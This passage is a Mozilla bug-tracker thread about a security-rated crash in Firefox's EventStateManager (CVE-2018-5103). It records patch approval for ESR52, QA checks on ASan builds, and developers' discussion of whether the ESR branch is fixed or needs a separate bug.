esm_relatedTarget_crash_esr52.diff

Sec-high, ESR52+
Attachment #8935726 - Flags: approval-mozilla-esr52? → approval-mozilla-esr52+
Whiteboard: [adv-main58+][adv-esr52.6+]
Alias: CVE-2018-5103
Flags: qe-verify+
Whiteboard: [adv-main58+][adv-esr52.6+] → [adv-main58+][adv-esr52.6+][post-critsmash-triage]
Flags: sec-bounty?
Using a workaround provided by Matt Wobensmith, I managed to reproduce the initial issue using the asan build mentioned in comment 0. I can also confirm that the latest asan builds for Firefox beta [1] and Firefox release [2] are verified fixed, using Ubuntu 16.04 x64.

[1] firefox.linux64-asan-debug (20180130110808)
[2] firefox.linux64-asan-debug (20180129172351)
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Also, the latest asan build for Firefox esr52 (linux64-asan-debug 20180129200715) seems to be still affected, as the crash is triggered using the steps provided in comment 0 (see the output https://goo.gl/LELxQK).
Flags: needinfo?(bugs)
ok, that output isn't useful. Trying to reproduce on esr
Flags: needinfo?(bugs)
Struggling to get local asan-esr52 to even start. I get complaints immediately.
ok, I see the issue. What is there on esr52 is totally different. Even in a different method.
Should this really be verified fixed for esr:58+  (i.e. 52.6.0) if we are only fixing the issue in bug 1434580 in the upcoming esr, 52.7.0?
Flags: needinfo?(bugs)
Yeah, I'm not really sure. There were basically two separate issues in EventStateManager code.
This bug fixes one issue, bug 1434580 another.
Flags: needinfo?(bugs)
Flags: sec-bounty? → sec-bounty+
Group: core-security-release